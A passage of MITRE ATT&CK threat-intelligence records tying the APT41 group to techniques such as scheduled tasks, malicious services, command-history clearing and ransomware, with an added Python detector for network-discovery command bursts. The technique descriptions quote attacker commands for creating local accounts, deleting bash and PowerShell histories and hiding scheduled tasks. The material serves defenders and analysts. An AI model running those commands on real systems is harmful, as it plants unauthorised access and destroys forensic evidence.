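The per-domain unique-subdomain count is the more robust of the two signals: a tunnel that keeps labels short and low-entropy to dodge the per-query score still has to vary the name on every request to defeat caching, and that shows up as cardinality. Expect legitimate high-cardinality parents (CDNs, anti-spam lookups, telemetry domains) and allow-list them by parent, not by client.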
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='command-and-control')]
|
||
technique_id : T1071.004
|
||
matrix : mitre-attack
|
||
platform : ['Linux', 'macOS', 'Windows']
|
||
data_sources : ['Network Traffic: Network Traffic Content', 'Network Traffic: Network Traffic Flow']
|
||
----------------------------------------------------------------------------------------------------
|
||
type : intrusion-set
|
||
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
|
||
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
created : 2019-09-23T13:43:36.945Z
|
||
modified : 2023-03-23T15:45:58.846Z
|
||
name : APT41
|
||
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
|
||
aliases : ['APT41', 'Wicked Panda']
|
||
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist: APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
|
||
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
|
||
x_mitre_attack_spec_version : 3.1.0
|
||
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
|
||
x_mitre_deprecated : False
|
||
x_mitre_domains : ['enterprise-attack']
|
||
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
x_mitre_version : 3.1
|
||
technique_ref : attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) collected MAC addresses from victim machines.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
relationship_id : relationship--adc6b431-0722-4287-8f37-e09ddb5b25fe
|
||
revoked : False
|
||
technique : System Network Configuration Discovery
|
||
technique_description : Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).
|
||
|
||
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. <code>show ip route</code>, <code>show ip interface</code>).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion)
|
||
|
||
Adversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next.
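Any one of the utilities named above is routine on an administrator's workstation. What distinguishes automated discovery is the burst: several different enumerations (interfaces, MAC addresses, ARP cache, routes) issued from the same parent process within seconds of each other. The following is an added example over command-execution telemetry, not MITRE text or APT41 code; the command lines are constructed, the `CommandEvent` fields are an assumed schema, and the tool-to-category table is illustrative.

```python
"""Detect a network-configuration discovery burst (T1016) in command
telemetry: several distinct discovery utilities run under the same host,
user and parent process within a short window.  A single ipconfig is noise;
four different enumerations in fifteen seconds from one parent is a script
or an operator.  Added example, not MITRE or APT41 code; the command lines
are constructed and the classification table is illustrative."""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import List, Optional, Tuple

TOOL_CATEGORY = {
    "ipconfig": "interfaces", "ifconfig": "interfaces", "getmac": "mac-addresses",
    "arp": "arp-cache", "route": "routes", "netstat": "connections",
    "nbtstat": "netbios", "netsh": "netsh",
}
IP_SUBCMD = {"a": "interfaces", "addr": "interfaces", "address": "interfaces", "link": "interfaces",
             "r": "routes", "route": "routes", "n": "arp-cache", "neigh": "arp-cache"}
WMI_NETCONF = re.compile(r"\b(nicconfig|win32_networkadapterconfiguration|get-netadapter|"
                         r"get-netipconfiguration|get-netipaddress)\b", re.I)


@dataclass(frozen=True)
class CommandEvent:
    ts: float
    host: str
    user: str
    parent_pid: int
    cmdline: str


def classify(cmdline: str) -> Optional[str]:
    tokens = cmdline.strip().split()
    if not tokens:
        return None
    exe = tokens[0].strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if exe.endswith(".exe"):
        exe = exe[:-4]
    if exe == "ip":                                   # Linux iproute2: category depends on subcommand
        return IP_SUBCMD.get(tokens[1]) if len(tokens) > 1 else None
    if exe in {"wmic", "powershell", "pwsh"} and WMI_NETCONF.search(cmdline):
        return "mac-addresses"
    return TOOL_CATEGORY.get(exe)


def detect_bursts(events: List[CommandEvent], window: float = 120.0,
                  min_distinct: int = 3) -> List[Tuple[Tuple[str, str, int], List[str]]]:
    by_actor = defaultdict(list)
    for ev in events:
        cat = classify(ev.cmdline)
        if cat:
            by_actor[(ev.host, ev.user, ev.parent_pid)].append((ev.ts, cat))
    alerts = []
    for actor, items in by_actor.items():
        items.sort()
        for i, (t0, _) in enumerate(items):           # sliding window anchored on each command
            cats = {c for t, c in items[i:] if t - t0 <= window}
            if len(cats) >= min_distinct:
                alerts.append((actor, sorted(cats)))
                break
    return alerts


# Constructed command telemetry (not real data).
SAMPLE_COMMANDS = [
    CommandEvent(0, "WS01", "bob", 4412, "ipconfig /all"),
    CommandEvent(5, "WS01", "bob", 4412, "getmac /v /fo list"),
    CommandEvent(9, "WS01", "bob", 4412, "arp -a"),
    CommandEvent(14, "WS01", "bob", 4412, "route print"),
    CommandEvent(20, "WS01", "bob", 4412, "whoami /all"),            # not a T1016 command
    CommandEvent(0, "WS02", "alice", 900, "ipconfig"),                # lone command: no alert
    CommandEvent(0, "LX01", "svc", 2000, "ip addr show"),
    CommandEvent(3, "LX01", "svc", 2000, "cat /etc/hosts"),
    CommandEvent(600, "LX01", "svc", 2000, "ip route"),               # too far apart, only two kinds
]

if __name__ == "__main__":
    for (host, user, ppid), cats in detect_bursts(SAMPLE_COMMANDS):
        print(f"{host} {user} parent={ppid}: {', '.join(cats)}")
```

Grouping by parent PID rather than by user is deliberate: an operator typing into one `cmd.exe` and a discovery script run by an implant both produce one parent, while a help-desk technician's scattered commands over an afternoon do not cluster. MAC-address collection specifically (the APT41 behaviour recorded here) also reaches the `mac-addresses` category through `wmic nicconfig` and `Get-NetAdapter`, which the regex covers.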
|
||
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='discovery')]
|
||
technique_id : T1016
|
||
matrix : mitre-attack
|
||
platform : ['Linux', 'macOS', 'Windows', 'Network']
|
||
data_sources : ['Command: Command Execution', 'Script: Script Execution', 'Process: Process Creation', 'Process: OS API Execution']
|
||
----------------------------------------------------------------------------------------------------
|
||
type : intrusion-set
|
||
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
|
||
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
created : 2019-09-23T13:43:36.945Z
|
||
modified : 2023-03-23T15:45:58.846Z
|
||
name : APT41
|
||
description : [APT41](https://attack.mitre.org/groups/G0096) is a threat group that researchers have assessed as a Chinese state-sponsored espionage group that also conducts financially-motivated operations. Active since at least 2012, [APT41](https://attack.mitre.org/groups/G0096) has been observed targeting healthcare, telecom, technology, and video game industries in 14 countries. [APT41](https://attack.mitre.org/groups/G0096) overlaps at least partially with public reporting on groups including BARIUM and [Winnti Group](https://attack.mitre.org/groups/G0044).(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021)
|
||
|
||
aliases : ['APT41', 'Wicked Panda']
|
||
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist: APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--635cbe30-392d-4e27-978e-66774357c762
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) has created user accounts.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--410d7922-e288-49ea-9607-27942505a416
revoked : False
technique : Local Account
technique_description : Adversaries may create a local account to maintain access to victim systems. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.
For example, with a sufficient level of access, the Windows <code>net user /add</code> command can be used to create a local account. On macOS systems the <code>dscl -create</code> command can be used to create a local account. Local accounts may also be added to network devices, often via common [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) commands such as <code>username</code>, or to Kubernetes clusters using the `kubectl` utility.(Citation: cisco_username_cmd)(Citation: Kubernetes Service Accounts Security)
Such accounts may be used to establish secondary credentialed access that does not require persistent remote access tools to be deployed on the system.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence')]
technique_id : T1136.001
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Network', 'Containers']
data_sources : ['User Account: User Account Creation', 'Process: Process Creation', 'Command: Command Execution']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
aliases : ['APT41', 'Wicked Panda']
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used a compromised account to create a scheduled task on a system.(Citation: FireEye APT41 Aug 2019)(Citation: Crowdstrike GTR2020 Mar 2020)
relationship_id : relationship--6a653820-adc1-4068-ab78-9165f2a2c5c1
revoked : False
technique : Scheduled Task
technique_description : Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.
The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)), though <code>at.exe</code> cannot access tasks created with <code>schtasks</code> or the Control Panel.
An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.(Citation: ProofPoint Serpent)
Adversaries may also create "hidden" scheduled tasks (i.e. [Hide Artifacts](https://attack.mitre.org/techniques/T1564)) that may not be visible to defender tools and manual queries used to enumerate tasks. Specifically, an adversary may hide a task from `schtasks /query` and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where deletion of this value must be completed using SYSTEM permissions).(Citation: SigmaHQ)(Citation: Tarrask scheduled task) Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g., `Index` value) within associated registry keys.(Citation: Defending Against Scheduled Task Attacks in Windows Environments)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')]
technique_id : T1053.005
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Windows Registry: Windows Registry Key Creation', 'File: File Modification', 'File: File Creation', 'Process: Process Creation', 'Command: Command Execution', 'Network Traffic: Network Traffic Flow', 'Scheduled Job: Scheduled Job Creation']
permissions_required : ['Administrator']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
aliases : ['APT41', 'Wicked Panda']
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) modified legitimate Windows services to install malware backdoors.(Citation: FireEye APT41 Aug 2019)(Citation: Group IB APT 41 June 2021) [APT41](https://attack.mitre.org/groups/G0096) created the StorSyncSvc service to provide persistence for Cobalt Strike.(Citation: FireEye APT41 March 2020)
relationship_id : relationship--29cd1209-5e90-448f-83d3-42c3ecdd1f70
revoked : False
technique : Windows Service
technique_description : Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.
Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API.
Adversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded and registered via [Native API](https://attack.mitre.org/techniques/T1106) functions such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creating the required service Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)), or by using command-line utilities such as `PnPUtil.exe`.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Unit42 AcidBox June 2020) Adversaries may leverage these drivers as [Rootkit](https://attack.mitre.org/techniques/T1014)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as "Bring Your Own Vulnerable Driver" (BYOVD)) as part of [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020)
Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). To make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (ex: using a service and/or payload name related to a legitimate OS or benign software component).
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='persistence'), KillChainPhase(kill_chain_name='mitre-attack', phase_name='privilege-escalation')]
technique_id : T1543.003
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Windows Registry: Windows Registry Key Modification', 'Process: Process Creation', 'Network Traffic: Network Traffic Flow', 'Service: Service Creation', 'Command: Command Execution', 'File: File Metadata', 'Windows Registry: Windows Registry Key Creation', 'Driver: Driver Load', 'Service: Service Modification', 'Process: OS API Execution']
effective_permissions : ['Administrator', 'SYSTEM']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
aliases : ['APT41', 'Wicked Panda']
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--3aef9463-9a7a-43ba-8957-a867e07c1e6a
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) attempted to remove evidence of some of its activity by deleting Bash histories.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--f8838a1f-3a62-40cc-98dd-55943091fcef
revoked : False
technique : Clear Command History
technique_description : In addition to clearing system logs, an adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they've done.
On Linux and macOS, these command histories can be accessed in a few different ways. While logged in, this command history is tracked in a file pointed to by the environment variable <code>HISTFILE</code>. When a user logs off a system, this information is flushed to a file in the user's home directory called <code>~/.bash_history</code>. The benefit of this is that it allows users to go back to commands they've used before in different sessions.
Adversaries may delete their commands from these logs by manually clearing the history (<code>history -c</code>) or by deleting the bash history file (<code>rm ~/.bash_history</code>).
Adversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to clear command history data (<code>clear logging</code> and/or <code>clear history</code>).(Citation: US-CERT-TA18-106A)
On Windows hosts, PowerShell has two different command history providers: the built-in history and the command history managed by the <code>PSReadLine</code> module. The built-in history only tracks the commands used in the current session. This command history is not available to other sessions and is deleted when the session ends.
The <code>PSReadLine</code> command history tracks the commands used in all PowerShell sessions and writes them to a file (<code>$env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt</code> by default). This history file is available to all sessions and contains all past history since the file is not deleted when the session ends.(Citation: Microsoft PowerShell Command History)
Adversaries may run the PowerShell command <code>Clear-History</code> to flush the entire command history from a current PowerShell session. This, however, will not delete/flush the <code>ConsoleHost_history.txt</code> file. Adversaries may also delete the <code>ConsoleHost_history.txt</code> file or edit its contents to hide PowerShell commands they have run.(Citation: Sophos PowerShell command audit)(Citation: Sophos PowerShell Command History Forensics)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='defense-evasion')]
technique_id : T1070.003
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'Network']
data_sources : ['File: File Deletion', 'File: File Modification', 'Command: Command Execution', 'User Account: User Account Authentication']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
aliases : ['APT41', 'Wicked Panda']
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used <code>cmd.exe /c</code> to execute commands on remote machines.(Citation: FireEye APT41 Aug 2019)
[APT41](https://attack.mitre.org/groups/G0096) used a batch file to install persistence for the [Cobalt Strike](https://attack.mitre.org/software/S0154) BEACON loader.(Citation: FireEye APT41 March 2020)
relationship_id : relationship--81a15403-9bb3-408a-8da6-97c64209c829
revoked : False
technique : Windows Command Shell
technique_description : Adversaries may abuse the Windows command shell for execution. The Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems. The Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands. The command prompt can be invoked remotely via [Remote Services](https://attack.mitre.org/techniques/T1021) such as [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: SSH in Windows)
Batch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops. Common uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple systems.
Adversaries may leverage [cmd](https://attack.mitre.org/software/S0106) to execute various commands and payloads. Common uses include [cmd](https://attack.mitre.org/software/S0106) to execute a single command, or abusing [cmd](https://attack.mitre.org/software/S0106) interactively with input and output forwarded over a command and control channel.
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='execution')]
technique_id : T1059.003
matrix : mitre-attack
platform : ['Windows']
data_sources : ['Command: Command Execution', 'Process: Process Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
aliases : ['APT41', 'Wicked Panda']
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
x_mitre_attack_spec_version : 3.1.0
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
x_mitre_deprecated : False
x_mitre_domains : ['enterprise-attack']
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_version : 3.1
technique_ref : attack-pattern--b80d107d-fa0d-4b60-9684-b0433e8bdba0
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used a ransomware called Encryptor RaaS to encrypt files on the targeted systems and provide a ransom note to the user.(Citation: FireEye APT41 Aug 2019)
relationship_id : relationship--acfaf7ec-7b92-40ec-a844-17089791a663
revoked : False
technique : Data Encrypted for Impact
technique_description : Adversaries may encrypt data on target systems or on large numbers of systems in a network to interrupt availability to system and network resources. They can attempt to render stored data inaccessible by encrypting files or data on local and remote drives and withholding access to a decryption key. This may be done in order to extract monetary compensation from a victim in exchange for decryption or a decryption key (ransomware) or to render data permanently inaccessible in cases where the key is not saved or transmitted.(Citation: US-CERT Ransomware 2016)(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017)(Citation: US-CERT SamSam 2018)
In the case of ransomware, it is typical that common user files like Office documents, PDFs, images, videos, audio, text, and source code files will be encrypted (and often renamed and/or tagged with specific file markers). Adversaries may need to first employ other behaviors, such as [File and Directory Permissions Modification](https://attack.mitre.org/techniques/T1222) or [System Shutdown/Reboot](https://attack.mitre.org/techniques/T1529), in order to unlock and/or gain access to manipulate these files.(Citation: CarbonBlack Conti July 2020) In some cases, adversaries may encrypt critical system files, disk partitions, and the MBR.(Citation: US-CERT NotPetya 2017)
To maximize impact on the target organization, malware designed for encrypting data may have worm-like features to propagate across a network by leveraging other attack techniques like [Valid Accounts](https://attack.mitre.org/techniques/T1078), [OS Credential Dumping](https://attack.mitre.org/techniques/T1003), and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002).(Citation: FireEye WannaCry 2017)(Citation: US-CERT NotPetya 2017) Encryption malware may also leverage [Internal Defacement](https://attack.mitre.org/techniques/T1491/001), such as changing victim wallpapers, or otherwise intimidate victims by sending ransom notes or other messages to connected printers (known as "print bombing").(Citation: NHS Digital Egregor Nov 2020)
In cloud environments, storage objects within compromised accounts may also be encrypted.(Citation: Rhino S3 Ransomware Part 1)
tactic : [KillChainPhase(kill_chain_name='mitre-attack', phase_name='impact')]
technique_id : T1486
matrix : mitre-attack
platform : ['Linux', 'macOS', 'Windows', 'IaaS']
data_sources : ['File: File Modification', 'Cloud Storage: Cloud Storage Modification', 'Network Share: Network Share Access', 'File: File Creation', 'Command: Command Execution', 'Process: Process Creation']
----------------------------------------------------------------------------------------------------
type : intrusion-set
id : intrusion-set--18854f55-ac7c-4634-bd9a-352dd07613b7
created_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
created : 2019-09-23T13:43:36.945Z
modified : 2023-03-23T15:45:58.846Z
name : APT41
aliases : ['APT41', 'Wicked Panda']
|
||
external_references : [{'source_name': 'mitre-attack', 'url': 'https://attack.mitre.org/groups/G0096', 'external_id': 'G0096'}, {'source_name': 'Wicked Panda', 'description': '(Citation: Crowdstrike GTR2020 Mar 2020)'}, {'source_name': 'APT41', 'description': '(Citation: FireEye APT41 2019)'}, {'source_name': 'Crowdstrike GTR2020 Mar 2020', 'description': 'Crowdstrike. (2020, March 2). 2020 Global Threat Report. Retrieved December 11, 2020.', 'url': 'https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf'}, {'source_name': 'FireEye APT41 2019', 'description': 'FireEye. (2019). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'FireEye APT41 Aug 2019', 'description': 'Fraser, N., et al. (2019, August 7). Double Dragon: APT41, a dual espionage and cyber crime operation. Retrieved September 23, 2019.', 'url': 'https://www.mandiant.com/sites/default/files/2022-02/rt-apt41-dual-operation.pdf'}, {'source_name': 'Group IB APT 41 June 2021', 'description': 'Rostovcev, N. (2021, June 10). Big airline heist APT41 likely behind a third-party attack on Air India. Retrieved August 26, 2021.', 'url': 'https://www.group-ib.com/blog/colunmtk-apt41/'}]
|
||
object_marking_refs : ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168']
|
||
x_mitre_attack_spec_version : 3.1.0
|
||
x_mitre_contributors : ['Kyaw Pyiyt Htet, @KyawPyiytHtet']
|
||
x_mitre_deprecated : False
|
||
x_mitre_domains : ['enterprise-attack']
|
||
x_mitre_modified_by_ref : identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
|
||
x_mitre_version : 3.1
|
||
technique_ref : attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7
|
||
relationship_description : [APT41](https://attack.mitre.org/groups/G0096) used legitimate websites for C2 through dead drop resolvers (DDR), including GitHub, Pastebin, and Microsoft TechNet.(Citation: FireEye APT41 Aug 2019)
|
||
relationship_id : relationship--964a9222-6e88-4850-89cc-6fc0f10ee4c9
|
||
revoked : False
|
||
technique : Dead Drop Resolver
|
||
technique_description : Adversaries may use an existing, legitimate external Web service to host information that points to additional command and control (C2) infrastructure. Adversaries may post content, known as a dead drop resolver, on Web services with embedded (and often obfuscated/encoded) domains or IP addresses. Once infected, victims will reach out to and be redirected by these resolvers.
|
||
|
||
